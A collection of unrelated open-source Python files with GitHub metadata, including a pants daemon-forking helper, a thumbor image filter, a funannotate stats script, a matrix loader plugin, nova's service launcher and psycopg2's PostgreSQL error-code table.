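#   MyDaemon(name='mydaemon').daemonize()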
def daemon_spawn(self, pre_fork_opts=None, post_fork_parent_opts=None, post_fork_child_opts=None):
"""Perform a single-fork to run a subprocess and write the child pid file.
Use this if your post_fork_child block invokes a subprocess via subprocess.Popen(). In this
case, a second fork such as used in daemonize() is extraneous given that Popen() also forks.
Using this daemonization method vs daemonize() leaves the responsibility of writing the pid
to the caller to allow for library-agnostic flexibility in subprocess execution.
"""
self.purge_metadata()
self.pre_fork(**pre_fork_opts or {})
pid = os.fork()
if pid == 0:
try:
os.setsid()
os.chdir(self._buildroot)
self.post_fork_child(**post_fork_child_opts or {})
except Exception:
logger.critical(traceback.format_exc())
finally:
os._exit(0)
else:
try:
self.post_fork_parent(**post_fork_parent_opts or {})
except Exception:
logger.critical(traceback.format_exc())
def pre_fork(self):
"""Pre-fork callback for subclasses."""
pass
def post_fork_child(self):
"""Pre-fork child callback for subclasses."""
pass
def post_fork_parent(self):
"""Post-fork parent callback for subclasses."""
pass
| {
"content_hash": "dc6893952228cb854c2797a40975ed72",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 100,
"avg_line_length": 40.652977412731005,
"alnum_prop": 0.6749671684008486,
"repo_name": "15Dkatz/pants",
"id": "a545691b75635957d96e810b72ffb9ed91224155",
"size": "19945",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/pants/pantsd/process_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "781"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "1805"
},
{
"name": "HTML",
"bytes": "79866"
},
{
"name": "Java",
"bytes": "481460"
},
{
"name": "JavaScript",
"bytes": "35417"
},
{
"name": "Python",
"bytes": "5884798"
},
{
"name": "Rust",
"bytes": "212512"
},
{
"name": "Scala",
"bytes": "76124"
},
{
"name": "Shell",
"bytes": "67399"
},
{
"name": "Thrift",
"bytes": "2795"
}
],
"symlink_target": ""
} |
from thumbor.filters import BaseFilter, filter_method
from thumbor.ext.filters import _round_corner
class Filter(BaseFilter):
@filter_method(r'[\d]+(?:\|[\d]+)?', BaseFilter.PositiveNumber, BaseFilter.PositiveNumber, BaseFilter.PositiveNumber, BaseFilter.Boolean)
def round_corner(self, radius, r, g, b, transparent=False):
width, height = self.engine.size
radius_parts = radius.split('|')
a_radius = int(radius_parts[0])
b_radius = int(radius_parts[1]) if len(radius_parts) > 1 else a_radius
if transparent:
self.engine.enable_alpha()
mode, data = self.engine.image_data_as_rgb()
imgdata = _round_corner.apply(
1, mode, a_radius, b_radius, r, g, b,
width, height, data, transparent
)
self.engine.set_image_data(imgdata)
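# Hedged usage sketch: in a thumbor URL this reads as e.g.
#   filters:round_corner(20,255,255,255)       uniform 20px radius
#   filters:round_corner(20|40,255,255,255)    distinct a/b radii
# (the pipe-separated form is what the regex above admits).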
| {
"content_hash": "2f4e347e7c900f3ddcc5e526498977ff",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 141,
"avg_line_length": 38.27272727272727,
"alnum_prop": 0.6377672209026128,
"repo_name": "voxmedia/thumbor",
"id": "3c5c4335d060f962205445efca9b3425ff653156",
"size": "1094",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "thumbor/filters/round_corner.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "62441"
},
{
"name": "JavaScript",
"bytes": "409"
},
{
"name": "Makefile",
"bytes": "10255"
},
{
"name": "Python",
"bytes": "596113"
}
],
"symlink_target": ""
} |
import sys
import argparse
import funannotate.library as lib
def main(args):
# setup menu with argparse
class MyFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(MyFormatter, self).__init__(prog, max_help_position=48)
parser = argparse.ArgumentParser(prog='stats.py',
description='''Script to run some simple genome annotation stats''',
epilog="""Written by Jon Palmer (2020) nextgenusfs@gmail.com""",
formatter_class=MyFormatter)
parser.add_argument('-f', '--fasta', required=True,
help='Genome in FASTA format')
parser.add_argument('-o', '--out', required=True,
help='JSON output stats file')
parser.add_argument('-g', '--gff',
help='Genome annotation in GFF3 format')
parser.add_argument('-t', '--tbl',
help='Genome annotation in TBL format')
parser.add_argument('--transcript_alignments',
help='transcript alignments in GFF3 format')
parser.add_argument('--protein_alignments',
help='protein alignments in GFF3 format')
args = parser.parse_args(args)
if not args.gff and not args.tbl:
print('Warning: no genome annotation passed (-t or -g), will only output genome assembly stats')
elif args.tbl:
print('Generating stats from Genome FASTA file and TBL annotation')
lib.annotation_summary(args.fasta, args.out, tbl=args.tbl,
transcripts=args.transcript_alignments,
proteins=args.protein_alignments)
elif args.gff:
print('Generating stats from Genome FASTA file and GFF3 annotation')
lib.annotation_summary(args.fasta, args.out, gff=args.gff,
transcripts=args.transcript_alignments,
proteins=args.protein_alignments)
print('Finished writing JSON stats file: {}'.format(args.out))
if __name__ == "__main__":
main(sys.argv[1:])
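# Hedged CLI sketch (paths hypothetical):
#   python stats.py -f genome.fa -g annotation.gff3 -o stats.json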
| {
"content_hash": "bf2798db2ee842236a8cbc184eef98ec",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 105,
"avg_line_length": 47.08695652173913,
"alnum_prop": 0.58264081255771,
"repo_name": "nextgenusfs/funannotate",
"id": "a38d7fd12e86ffcaec57ceef1c2970632b91947f",
"size": "2213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "funannotate/utilities/stats.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "291"
},
{
"name": "Dockerfile",
"bytes": "2669"
},
{
"name": "JavaScript",
"bytes": "2771"
},
{
"name": "Perl",
"bytes": "138330"
},
{
"name": "Python",
"bytes": "1542730"
},
{
"name": "Scala",
"bytes": "1523"
},
{
"name": "Shell",
"bytes": "2930"
},
{
"name": "Singularity",
"bytes": "100"
}
],
"symlink_target": ""
} |
import masterPlugin
import os
import libHercmIO
## load command plugin
#
# Based on arguments, loads a matrix from a file into WORKINGMATRIX, then
# then returns it as a libHercMatrix.hercMatrix instance
class loader(masterPlugin.masterPlugin):
def __init__(this):
super().__init__()
this.command = "load"
this.aliases = ["l"]
this.commandInfo = {'requiredArguments': [[0, str, 'path']],
'optionalArguments': [[1, str, 'format']],
'argumentInfo': ['The file to load', 'The format of said file'],
'help': """Reads in the file for viewing and manipulation. If format
is not provided, it will be extrapolated from the filename"""}
def execute(this, arguments, WORKINGMATRIX):
filename = arguments[0]
form = None
if len(arguments) == 2:
form = arguments[1]
else:
form = this.extrapolateFormat(arguments[0])
WORKINGMATRIX = libHercmIO.readMatrix(filename, form, True)
return WORKINGMATRIX
def validate(this, arguments, WORKINGMATRIX):
if not super().validate(arguments, WORKINGMATRIX):
return False
if len(arguments) == 1:
if this.extrapolateFormat(arguments[0]) is None:
print("ERROR: could not extrapolate format from filename")
return False
if not os.path.exists(arguments[0]):
print("ERROR: target file does not exist!")
return False
if not os.path.isfile(arguments[0]):
print("ERROR: target is a directory, not a file")
return False
return True
## attempt to extrapolate format from filename
# returns the format if it can be extrapolated, or None if it cannot
def extrapolateFormat(this, filename):
if filename[-3:] == "bxf":
return 'bxf'
if filename[-3:] == 'mat':
return 'mat'
if filename[-3:] == 'mtx':
return 'mtx'
if filename[-5:] == 'hercm':
return 'hercm'
if filename[-6:] == 'valcol':
return 'valcol'
return None
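# Example (hypothetical session): "load matrix.mtx" extrapolates 'mtx', while
# "load data.bin" fails validation because no known extension matches.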
| {
"content_hash": "1ab979dd43e845ffff90f3abd16af835",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 80,
"avg_line_length": 32.90909090909091,
"alnum_prop": 0.5828729281767956,
"repo_name": "charlesdaniels/hercm",
"id": "137b423cdbfd17bb0fb58a91151197555cdb2343",
"size": "2172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python33/menuPlugins/load.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8577"
},
{
"name": "Makefile",
"bytes": "139"
},
{
"name": "Python",
"bytes": "113163"
}
],
"symlink_target": ""
} |
"""Starter script for all nova services.
This script attempts to start all the nova services in one process. Each
service is started in its own greenthread. Please note that exceptions and
sys.exit() on the starting of a service are logged and the script will
continue attempting to launch the rest of the services.
"""
import sys
from oslo.config import cfg
from nova import config
from nova.objectstore import s3server
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova import service
from nova import utils
from nova.vnc import xvp_proxy
CONF = cfg.CONF
CONF.import_opt('manager', 'nova.conductor.api', group='conductor')
CONF.import_opt('topic', 'nova.conductor.api', group='conductor')
CONF.import_opt('enabled_apis', 'nova.service')
CONF.import_opt('enabled_ssl_apis', 'nova.service')
def main():
config.parse_args(sys.argv)
logging.setup("nova")
LOG = logging.getLogger('nova.all')
utils.monkey_patch()
launcher = service.process_launcher()
# nova-api
for api in CONF.enabled_apis:
try:
should_use_ssl = api in CONF.enabled_ssl_apis
server = service.WSGIService(api, use_ssl=should_use_ssl)
launcher.launch_service(server, workers=server.workers or 1)
except (Exception, SystemExit):
LOG.exception(_('Failed to load %s') % '%s-api' % api)
for mod in [s3server, xvp_proxy]:
try:
launcher.launch_service(mod.get_wsgi_server())
except (Exception, SystemExit):
LOG.exception(_('Failed to load %s') % mod.__name__)
for binary in ['nova-compute', 'nova-network', 'nova-scheduler',
'nova-cert', 'nova-conductor']:
# FIXME(sirp): Most service configs are defined in nova/service.py, but
# conductor has set a new precedent of storing these configs
# nova/<service>/api.py.
#
# We should update the existing services to use this new approach so we
# don't have to treat conductor differently here.
if binary == 'nova-conductor':
topic = CONF.conductor.topic
manager = CONF.conductor.manager
else:
topic = None
manager = None
try:
launcher.launch_service(service.Service.create(binary=binary,
topic=topic,
manager=manager))
except (Exception, SystemExit):
LOG.exception(_('Failed to load %s'), binary)
launcher.wait()
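# Note: each launch above is wrapped in try/except so one service that fails
# to load does not abort the rest; launcher.wait() then blocks until the
# successfully started services exit.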
| {
"content_hash": "c290a1fbad18f44e0f9bcd9cd5b5e3f3",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 79,
"avg_line_length": 35.4054054054054,
"alnum_prop": 0.6301526717557252,
"repo_name": "luogangyi/bcec-nova",
"id": "0c44de6e21bd5a087fed459c7d62dcd1d0a485ac",
"size": "3389",
"binary": false,
"copies": "13",
"ref": "refs/heads/stable/icehouse",
"path": "nova/cmd/all.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "4119"
},
{
"name": "Python",
"bytes": "14033515"
},
{
"name": "Shell",
"bytes": "94649"
}
],
"symlink_target": ""
} |
'''
Created on Mar 2, 2013
@author: nino
'''
class PermissionDeniedError(Exception):
pass
class User(object):
def __init__(self, name):
self.name = name
def is_authorized(self, action): return True
def can_throw(self): return False
def increment(self, stat, count=1): pass
| {
"content_hash": "be8ee1e1785749cd7e76ec9b11c9a462",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 48,
"avg_line_length": 15.45,
"alnum_prop": 0.6440129449838188,
"repo_name": "escherba/marx",
"id": "3462aff42af4c4e77cb6b41054808d3e0b153191",
"size": "309",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/workflow/example_objects.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "296"
},
{
"name": "Python",
"bytes": "36490"
}
],
"symlink_target": ""
} |
"""Error codes for PostgresSQL
This module contains symbolic names for all PostgreSQL error codes.
"""
# psycopg2/errorcodes.py - PostgreSQL error codes
#
# Copyright (C) 2006-2010 Johan Dahlin <jdahlin@async.com.br>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
#
# Based on:
#
# http://www.postgresql.org/docs/current/static/errcodes-appendix.html
#
def lookup(code, _cache={}):
"""Lookup an error code or class code and return its symbolic name.
Raise `KeyError` if the code is not found.
"""
if _cache:
return _cache[code]
# Generate the lookup map at first usage.
tmp = {}
for k, v in globals().items():
if isinstance(v, str) and len(v) in (2, 5):
tmp[v] = k
assert tmp
# Atomic update, to avoid race condition on import (bug #382)
_cache.update(tmp)
return _cache[code]
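# Usage sketch: lookup('23505') -> 'UNIQUE_VIOLATION', lookup('23') ->
# 'CLASS_INTEGRITY_CONSTRAINT_VIOLATION'; unknown codes raise KeyError.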
# autogenerated data: do not edit below this point.
# Error classes
CLASS_SUCCESSFUL_COMPLETION = '00'
CLASS_WARNING = '01'
CLASS_NO_DATA = '02'
CLASS_SQL_STATEMENT_NOT_YET_COMPLETE = '03'
CLASS_CONNECTION_EXCEPTION = '08'
CLASS_TRIGGERED_ACTION_EXCEPTION = '09'
CLASS_FEATURE_NOT_SUPPORTED = '0A'
CLASS_INVALID_TRANSACTION_INITIATION = '0B'
CLASS_LOCATOR_EXCEPTION = '0F'
CLASS_INVALID_GRANTOR = '0L'
CLASS_INVALID_ROLE_SPECIFICATION = '0P'
CLASS_DIAGNOSTICS_EXCEPTION = '0Z'
CLASS_CASE_NOT_FOUND = '20'
CLASS_CARDINALITY_VIOLATION = '21'
CLASS_DATA_EXCEPTION = '22'
CLASS_INTEGRITY_CONSTRAINT_VIOLATION = '23'
CLASS_INVALID_CURSOR_STATE = '24'
CLASS_INVALID_TRANSACTION_STATE = '25'
CLASS_INVALID_SQL_STATEMENT_NAME = '26'
CLASS_TRIGGERED_DATA_CHANGE_VIOLATION = '27'
CLASS_INVALID_AUTHORIZATION_SPECIFICATION = '28'
CLASS_DEPENDENT_PRIVILEGE_DESCRIPTORS_STILL_EXIST = '2B'
CLASS_INVALID_TRANSACTION_TERMINATION = '2D'
CLASS_SQL_ROUTINE_EXCEPTION = '2F'
CLASS_INVALID_CURSOR_NAME = '34'
CLASS_EXTERNAL_ROUTINE_EXCEPTION = '38'
CLASS_EXTERNAL_ROUTINE_INVOCATION_EXCEPTION = '39'
CLASS_SAVEPOINT_EXCEPTION = '3B'
CLASS_INVALID_CATALOG_NAME = '3D'
CLASS_INVALID_SCHEMA_NAME = '3F'
CLASS_TRANSACTION_ROLLBACK = '40'
CLASS_SYNTAX_ERROR_OR_ACCESS_RULE_VIOLATION = '42'
CLASS_WITH_CHECK_OPTION_VIOLATION = '44'
CLASS_INSUFFICIENT_RESOURCES = '53'
CLASS_PROGRAM_LIMIT_EXCEEDED = '54'
CLASS_OBJECT_NOT_IN_PREREQUISITE_STATE = '55'
CLASS_OPERATOR_INTERVENTION = '57'
CLASS_SYSTEM_ERROR = '58'
CLASS_SNAPSHOT_FAILURE = '72'
CLASS_CONFIGURATION_FILE_ERROR = 'F0'
CLASS_FOREIGN_DATA_WRAPPER_ERROR = 'HV'
CLASS_PL_PGSQL_ERROR = 'P0'
CLASS_INTERNAL_ERROR = 'XX'
# Class 00 - Successful Completion
SUCCESSFUL_COMPLETION = '00000'
# Class 01 - Warning
WARNING = '01000'
NULL_VALUE_ELIMINATED_IN_SET_FUNCTION = '01003'
STRING_DATA_RIGHT_TRUNCATION = '01004'
PRIVILEGE_NOT_REVOKED = '01006'
PRIVILEGE_NOT_GRANTED = '01007'
IMPLICIT_ZERO_BIT_PADDING = '01008'
DYNAMIC_RESULT_SETS_RETURNED = '0100C'
DEPRECATED_FEATURE = '01P01'
# Class 02 - No Data (this is also a warning class per the SQL standard)
NO_DATA = '02000'
NO_ADDITIONAL_DYNAMIC_RESULT_SETS_RETURNED = '02001'
# Class 03 - SQL Statement Not Yet Complete
SQL_STATEMENT_NOT_YET_COMPLETE = '03000'
# Class 08 - Connection Exception
CONNECTION_EXCEPTION = '08000'
SQLCLIENT_UNABLE_TO_ESTABLISH_SQLCONNECTION = '08001'
CONNECTION_DOES_NOT_EXIST = '08003'
SQLSERVER_REJECTED_ESTABLISHMENT_OF_SQLCONNECTION = '08004'
CONNECTION_FAILURE = '08006'
TRANSACTION_RESOLUTION_UNKNOWN = '08007'
PROTOCOL_VIOLATION = '08P01'
# Class 09 - Triggered Action Exception
TRIGGERED_ACTION_EXCEPTION = '09000'
# Class 0A - Feature Not Supported
FEATURE_NOT_SUPPORTED = '0A000'
# Class 0B - Invalid Transaction Initiation
INVALID_TRANSACTION_INITIATION = '0B000'
# Class 0F - Locator Exception
LOCATOR_EXCEPTION = '0F000'
INVALID_LOCATOR_SPECIFICATION = '0F001'
# Class 0L - Invalid Grantor
INVALID_GRANTOR = '0L000'
INVALID_GRANT_OPERATION = '0LP01'
# Class 0P - Invalid Role Specification
INVALID_ROLE_SPECIFICATION = '0P000'
# Class 0Z - Diagnostics Exception
DIAGNOSTICS_EXCEPTION = '0Z000'
STACKED_DIAGNOSTICS_ACCESSED_WITHOUT_ACTIVE_HANDLER = '0Z002'
# Class 20 - Case Not Found
CASE_NOT_FOUND = '20000'
# Class 21 - Cardinality Violation
CARDINALITY_VIOLATION = '21000'
# Class 22 - Data Exception
DATA_EXCEPTION = '22000'
STRING_DATA_RIGHT_TRUNCATION = '22001'
NULL_VALUE_NO_INDICATOR_PARAMETER = '22002'
NUMERIC_VALUE_OUT_OF_RANGE = '22003'
NULL_VALUE_NOT_ALLOWED = '22004'
ERROR_IN_ASSIGNMENT = '22005'
INVALID_DATETIME_FORMAT = '22007'
DATETIME_FIELD_OVERFLOW = '22008'
INVALID_TIME_ZONE_DISPLACEMENT_VALUE = '22009'
ESCAPE_CHARACTER_CONFLICT = '2200B'
INVALID_USE_OF_ESCAPE_CHARACTER = '2200C'
INVALID_ESCAPE_OCTET = '2200D'
ZERO_LENGTH_CHARACTER_STRING = '2200F'
MOST_SPECIFIC_TYPE_MISMATCH = '2200G'
SEQUENCE_GENERATOR_LIMIT_EXCEEDED = '2200H'
NOT_AN_XML_DOCUMENT = '2200L'
INVALID_XML_DOCUMENT = '2200M'
INVALID_XML_CONTENT = '2200N'
INVALID_XML_COMMENT = '2200S'
INVALID_XML_PROCESSING_INSTRUCTION = '2200T'
INVALID_INDICATOR_PARAMETER_VALUE = '22010'
SUBSTRING_ERROR = '22011'
DIVISION_BY_ZERO = '22012'
INVALID_ARGUMENT_FOR_NTILE_FUNCTION = '22014'
INTERVAL_FIELD_OVERFLOW = '22015'
INVALID_ARGUMENT_FOR_NTH_VALUE_FUNCTION = '22016'
INVALID_CHARACTER_VALUE_FOR_CAST = '22018'
INVALID_ESCAPE_CHARACTER = '22019'
INVALID_REGULAR_EXPRESSION = '2201B'
INVALID_ARGUMENT_FOR_LOGARITHM = '2201E'
INVALID_ARGUMENT_FOR_POWER_FUNCTION = '2201F'
INVALID_ARGUMENT_FOR_WIDTH_BUCKET_FUNCTION = '2201G'
INVALID_ROW_COUNT_IN_LIMIT_CLAUSE = '2201W'
INVALID_ROW_COUNT_IN_RESULT_OFFSET_CLAUSE = '2201X'
INVALID_LIMIT_VALUE = '22020'
CHARACTER_NOT_IN_REPERTOIRE = '22021'
INDICATOR_OVERFLOW = '22022'
INVALID_PARAMETER_VALUE = '22023'
UNTERMINATED_C_STRING = '22024'
INVALID_ESCAPE_SEQUENCE = '22025'
STRING_DATA_LENGTH_MISMATCH = '22026'
TRIM_ERROR = '22027'
ARRAY_SUBSCRIPT_ERROR = '2202E'
INVALID_TABLESAMPLE_REPEAT = '2202G'
INVALID_TABLESAMPLE_ARGUMENT = '2202H'
FLOATING_POINT_EXCEPTION = '22P01'
INVALID_TEXT_REPRESENTATION = '22P02'
INVALID_BINARY_REPRESENTATION = '22P03'
BAD_COPY_FILE_FORMAT = '22P04'
UNTRANSLATABLE_CHARACTER = '22P05'
NONSTANDARD_USE_OF_ESCAPE_CHARACTER = '22P06'
# Class 23 - Integrity Constraint Violation
INTEGRITY_CONSTRAINT_VIOLATION = '23000'
RESTRICT_VIOLATION = '23001'
NOT_NULL_VIOLATION = '23502'
FOREIGN_KEY_VIOLATION = '23503'
UNIQUE_VIOLATION = '23505'
CHECK_VIOLATION = '23514'
EXCLUSION_VIOLATION = '23P01'
# Class 24 - Invalid Cursor State
INVALID_CURSOR_STATE = '24000'
# Class 25 - Invalid Transaction State
INVALID_TRANSACTION_STATE = '25000'
ACTIVE_SQL_TRANSACTION = '25001'
BRANCH_TRANSACTION_ALREADY_ACTIVE = '25002'
INAPPROPRIATE_ACCESS_MODE_FOR_BRANCH_TRANSACTION = '25003'
INAPPROPRIATE_ISOLATION_LEVEL_FOR_BRANCH_TRANSACTION = '25004'
NO_ACTIVE_SQL_TRANSACTION_FOR_BRANCH_TRANSACTION = '25005'
READ_ONLY_SQL_TRANSACTION = '25006'
SCHEMA_AND_DATA_STATEMENT_MIXING_NOT_SUPPORTED = '25007'
HELD_CURSOR_REQUIRES_SAME_ISOLATION_LEVEL = '25008'
NO_ACTIVE_SQL_TRANSACTION = '25P01'
IN_FAILED_SQL_TRANSACTION = '25P02'
IDLE_IN_TRANSACTION_SESSION_TIMEOUT = '25P03'
# Class 26 - Invalid SQL Statement Name
INVALID_SQL_STATEMENT_NAME = '26000'
# Class 27 - Triggered Data Change Violation
TRIGGERED_DATA_CHANGE_VIOLATION = '27000'
# Class 28 - Invalid Authorization Specification
INVALID_AUTHORIZATION_SPECIFICATION = '28000'
INVALID_PASSWORD = '28P01'
# Class 2B - Dependent Privilege Descriptors Still Exist
DEPENDENT_PRIVILEGE_DESCRIPTORS_STILL_EXIST = '2B000'
DEPENDENT_OBJECTS_STILL_EXIST = '2BP01'
# Class 2D - Invalid Transaction Termination
INVALID_TRANSACTION_TERMINATION = '2D000'
# Class 2F - SQL Routine Exception
SQL_ROUTINE_EXCEPTION = '2F000'
MODIFYING_SQL_DATA_NOT_PERMITTED = '2F002'
PROHIBITED_SQL_STATEMENT_ATTEMPTED = '2F003'
READING_SQL_DATA_NOT_PERMITTED = '2F004'
FUNCTION_EXECUTED_NO_RETURN_STATEMENT = '2F005'
# Class 34 - Invalid Cursor Name
INVALID_CURSOR_NAME = '34000'
# Class 38 - External Routine Exception
EXTERNAL_ROUTINE_EXCEPTION = '38000'
CONTAINING_SQL_NOT_PERMITTED = '38001'
MODIFYING_SQL_DATA_NOT_PERMITTED = '38002'
PROHIBITED_SQL_STATEMENT_ATTEMPTED = '38003'
READING_SQL_DATA_NOT_PERMITTED = '38004'
# Class 39 - External Routine Invocation Exception
EXTERNAL_ROUTINE_INVOCATION_EXCEPTION = '39000'
INVALID_SQLSTATE_RETURNED = '39001'
NULL_VALUE_NOT_ALLOWED = '39004'
TRIGGER_PROTOCOL_VIOLATED = '39P01'
SRF_PROTOCOL_VIOLATED = '39P02'
EVENT_TRIGGER_PROTOCOL_VIOLATED = '39P03'
# Class 3B - Savepoint Exception
SAVEPOINT_EXCEPTION = '3B000'
INVALID_SAVEPOINT_SPECIFICATION = '3B001'
# Class 3D - Invalid Catalog Name
INVALID_CATALOG_NAME = '3D000'
# Class 3F - Invalid Schema Name
INVALID_SCHEMA_NAME = '3F000'
# Class 40 - Transaction Rollback
TRANSACTION_ROLLBACK = '40000'
SERIALIZATION_FAILURE = '40001'
TRANSACTION_INTEGRITY_CONSTRAINT_VIOLATION = '40002'
STATEMENT_COMPLETION_UNKNOWN = '40003'
DEADLOCK_DETECTED = '40P01'
# Class 42 - Syntax Error or Access Rule Violation
SYNTAX_ERROR_OR_ACCESS_RULE_VIOLATION = '42000'
INSUFFICIENT_PRIVILEGE = '42501'
SYNTAX_ERROR = '42601'
INVALID_NAME = '42602'
INVALID_COLUMN_DEFINITION = '42611'
NAME_TOO_LONG = '42622'
DUPLICATE_COLUMN = '42701'
AMBIGUOUS_COLUMN = '42702'
UNDEFINED_COLUMN = '42703'
UNDEFINED_OBJECT = '42704'
DUPLICATE_OBJECT = '42710'
DUPLICATE_ALIAS = '42712'
DUPLICATE_FUNCTION = '42723'
AMBIGUOUS_FUNCTION = '42725'
GROUPING_ERROR = '42803'
DATATYPE_MISMATCH = '42804'
WRONG_OBJECT_TYPE = '42809'
INVALID_FOREIGN_KEY = '42830'
CANNOT_COERCE = '42846'
UNDEFINED_FUNCTION = '42883'
GENERATED_ALWAYS = '428C9'
RESERVED_NAME = '42939'
UNDEFINED_TABLE = '42P01'
UNDEFINED_PARAMETER = '42P02'
DUPLICATE_CURSOR = '42P03'
DUPLICATE_DATABASE = '42P04'
DUPLICATE_PREPARED_STATEMENT = '42P05'
DUPLICATE_SCHEMA = '42P06'
DUPLICATE_TABLE = '42P07'
AMBIGUOUS_PARAMETER = '42P08'
AMBIGUOUS_ALIAS = '42P09'
INVALID_COLUMN_REFERENCE = '42P10'
INVALID_CURSOR_DEFINITION = '42P11'
INVALID_DATABASE_DEFINITION = '42P12'
INVALID_FUNCTION_DEFINITION = '42P13'
INVALID_PREPARED_STATEMENT_DEFINITION = '42P14'
INVALID_SCHEMA_DEFINITION = '42P15'
INVALID_TABLE_DEFINITION = '42P16'
INVALID_OBJECT_DEFINITION = '42P17'
INDETERMINATE_DATATYPE = '42P18'
INVALID_RECURSION = '42P19'
WINDOWING_ERROR = '42P20'
COLLATION_MISMATCH = '42P21'
INDETERMINATE_COLLATION = '42P22'
# Class 44 - WITH CHECK OPTION Violation
WITH_CHECK_OPTION_VIOLATION = '44000'
# Class 53 - Insufficient Resources
INSUFFICIENT_RESOURCES = '53000'
DISK_FULL = '53100'
OUT_OF_MEMORY = '53200'
TOO_MANY_CONNECTIONS = '53300'
CONFIGURATION_LIMIT_EXCEEDED = '53400'
# Class 54 - Program Limit Exceeded
PROGRAM_LIMIT_EXCEEDED = '54000'
STATEMENT_TOO_COMPLEX = '54001'
TOO_MANY_COLUMNS = '54011'
TOO_MANY_ARGUMENTS = '54023'
# Class 55 - Object Not In Prerequisite State
OBJECT_NOT_IN_PREREQUISITE_STATE = '55000'
OBJECT_IN_USE = '55006'
CANT_CHANGE_RUNTIME_PARAM = '55P02'
LOCK_NOT_AVAILABLE = '55P03'
UNSAFE_NEW_ENUM_VALUE_USAGE = '55P04'
# Class 57 - Operator Intervention
OPERATOR_INTERVENTION = '57000'
QUERY_CANCELED = '57014'
ADMIN_SHUTDOWN = '57P01'
CRASH_SHUTDOWN = '57P02'
CANNOT_CONNECT_NOW = '57P03'
DATABASE_DROPPED = '57P04'
# Class 58 - System Error (errors external to PostgreSQL itself)
SYSTEM_ERROR = '58000'
IO_ERROR = '58030'
UNDEFINED_FILE = '58P01'
DUPLICATE_FILE = '58P02'
# Class 72 - Snapshot Failure
SNAPSHOT_TOO_OLD = '72000'
# Class F0 - Configuration File Error
CONFIG_FILE_ERROR = 'F0000'
LOCK_FILE_EXISTS = 'F0001'
# Class HV - Foreign Data Wrapper Error (SQL/MED)
FDW_ERROR = 'HV000'
FDW_OUT_OF_MEMORY = 'HV001'
FDW_DYNAMIC_PARAMETER_VALUE_NEEDED = 'HV002'
FDW_INVALID_DATA_TYPE = 'HV004'
FDW_COLUMN_NAME_NOT_FOUND = 'HV005'
FDW_INVALID_DATA_TYPE_DESCRIPTORS = 'HV006'
FDW_INVALID_COLUMN_NAME = 'HV007'
FDW_INVALID_COLUMN_NUMBER = 'HV008'
FDW_INVALID_USE_OF_NULL_POINTER = 'HV009'
FDW_INVALID_STRING_FORMAT = 'HV00A'
FDW_INVALID_HANDLE = 'HV00B'
FDW_INVALID_OPTION_INDEX = 'HV00C'
FDW_INVALID_OPTION_NAME = 'HV00D'
FDW_OPTION_NAME_NOT_FOUND = 'HV00J'
FDW_REPLY_HANDLE = 'HV00K'
FDW_UNABLE_TO_CREATE_EXECUTION = 'HV00L'
FDW_UNABLE_TO_CREATE_REPLY = 'HV00M'
FDW_UNABLE_TO_ESTABLISH_CONNECTION = 'HV00N'
FDW_NO_SCHEMAS = 'HV00P'
FDW_SCHEMA_NOT_FOUND = 'HV00Q'
FDW_TABLE_NOT_FOUND = 'HV00R'
FDW_FUNCTION_SEQUENCE_ERROR = 'HV010'
FDW_TOO_MANY_HANDLES = 'HV014'
FDW_INCONSISTENT_DESCRIPTOR_INFORMATION = 'HV021'
FDW_INVALID_ATTRIBUTE_VALUE = 'HV024'
FDW_INVALID_STRING_LENGTH_OR_BUFFER_LENGTH = 'HV090'
FDW_INVALID_DESCRIPTOR_FIELD_IDENTIFIER = 'HV091'
# Class P0 - PL/pgSQL Error
PLPGSQL_ERROR = 'P0000'
RAISE_EXCEPTION = 'P0001'
NO_DATA_FOUND = 'P0002'
TOO_MANY_ROWS = 'P0003'
ASSERT_FAILURE = 'P0004'
# Class XX - Internal Error
INTERNAL_ERROR = 'XX000'
DATA_CORRUPTED = 'XX001'
INDEX_CORRUPTED = 'XX002'
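# Minimal usage sketch of lookup() (illustration only; _demo_lookup is a
# hypothetical helper, not part of the module's public API):
def _demo_lookup():
    for code in ('23505', '40P01', 'XX000'):
        print('%s -> %s' % (code, lookup(code)))
if __name__ == '__main__':
    _demo_lookup()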
| {
"content_hash": "b02660e27367b347586dc48a210a32ad",
"timestamp": "",
"source": "github",
"line_count": 428,
"max_line_length": 73,
"avg_line_length": 31.507009345794394,
"alnum_prop": 0.7517241379310344,
"repo_name": "bcarroll/authmgr",
"id": "b8742f52a2f74fb0581f7d2906c8dc0832f6cefd",
"size": "13485",
"binary": false,
"copies": "7",
